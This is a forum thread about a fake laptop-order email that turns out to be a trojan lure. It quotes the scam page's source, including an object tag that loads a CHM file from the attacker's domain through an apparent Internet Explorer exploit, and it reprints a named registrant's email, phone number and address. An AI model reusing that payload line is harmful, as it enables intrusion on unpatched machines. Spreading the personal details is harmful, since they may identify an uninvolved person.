View Full Version : Another wierd one...!
I've just had this e-mail turn up:
* * * * *
Thank you for your order!
You order summary:
IBM ThinkPad R50 Intel Pentium 1700 Mhz
512Mb RAM, 40 Gb Hard Drive, 15 " TFT XGA, 64Mb Shared Graphics, MS Works 7.0 Software, 5 x USB Connections, Windows XP Home Edition,
1 Year Free Warranty
Your bank account is billed for:
£1099.9 9 (inc. VAT)
Your order would be shipped to the address confirmed at order.
To track your order visit:
http://sunairthebest.org/index.html?trackorder=29992kkE999
To cancel or delay the order visit:
http://sunairthebest.org/index.html?stoporder=29992kkE999
Thank you for choosing Sun Light Electronics!
SunLight Electronics
London UK
http://sunairthebest.org/
* * * * *
Now I, of course, haven't ordered this and I presume it's some sort of scam, but the site has already been deleted, so I've no idea exactly what it was trying to pull.
Anyone seen/ know anything about this one?
are you sure that they were genuine links rather than links to .scr files on your local machine. I have had a lot of mails lately with this kind of thing on. I am sorely tempted to open the links you have given... but i think i should resist....!
EDIT: couldn't resist!! page source appears as follows....
<html>
<head>
<title></title>
</head>
<body>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://sunairthebest.org//main1.chm::/main1.html" type="text/x-scriptlet"></object>
<h1>404 Not found</h1>
<h3>the page is removed for hosting policy violation</h3>
</body>
</html>
Ordinarily, I would of said some muppet typed in your address by mistake. (Happens to me a lot, I get loads of e-mails from boards and website services where Grace and Gerry tried to sign up to something), but.... The site seems a bit weird. An electronics company trading as an Org? I've done a whois on it, and it looks a bit suspect. The fact the page has been taken down for a"hosting policy violation" meant it was probably a fake site for fleecing people.
Ordinarily, I would of said some muppet typed in your address by mistake.
It's unlikely that someone would have accidentally typed my affordable leather domain in by mistake!! :)
The fact the page has been taken down for a"hosting policy violation" meant it was probably a fake site for fleecing people.
Yes, I was just wondering exactly what the scam was. I figured that because it's got the "stop" address, it's maybe trying to confirm addresses for future spam, but I don't know.
Yes, I was just wondering exactly what the scam was. I figured that because it's got the "stop" address, it's maybe trying to confirm addresses for future spam, but I don't know.
I suppose whatever nefarious act it was doing, it's finished with now, because the host company has pulled it. However, if you email hillaryjknowles@yahoo.co.uk and ask her reeeeeally nice, she might tell you :)
Registrant Name:LEW inc
Registrant Organization:LEW inc
Registrant Street1:200 Sutton Passeys Crescent
Registrant City:Wollaton
Registrant State/Province:NA
Registrant Postal Code:NG8 1DZ
Registrant Country:GB
Registrant Phone:+44.07899980958
Registrant FAX:+613.86242499
Registrant Email:hillaryjknowles@yahoo.co.uk
I suppose whatever nefarious act it was doing, it's finished with now, because the host company has pulled it. However, if you email hillaryjknowles@yahoo.co.uk and ask her reeeeeally nice, she might tell you :)
or we could phone her ... anyone dare? :D
Don't forget that spammers will often fake name/details of a company purely to get innocent businesses into trouble.
See the 5th post on my spam fighting thread where "Joe Jobbing" is explained :
http://www.cableforum.co.uk/board/showthread.php?t=10441
Simply doing a WHOIS on a domain, without checking the email header will often lead you to the innocent party.
* I'm not saying that this is the case for the above situation, just that it's worth keeping in mind when investigating spam.
I've just had this e-mail turn up:
* * * * *
Thank you for your order!
You order summary:
IBM ThinkPad R50 Intel Pentium 1700 Mhz
* * * * *
Now I, of course, haven't ordered this and I presume it's some sort of scam, but the site has already been deleted, so I've no idea exactly what it was trying to pull.
A follow up to this:
http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/
Apparently it's an attempt con people into allowing a trojan onto their computer to exploit a new IE vuln.
Since I use Netscape I'm not worrying but if anyone who uses IE did get to look at the site before it was pulled they'd better do a virus check.
vBulletin® v3.8.11, Copyright ©2000-2024, vBulletin Solutions Inc.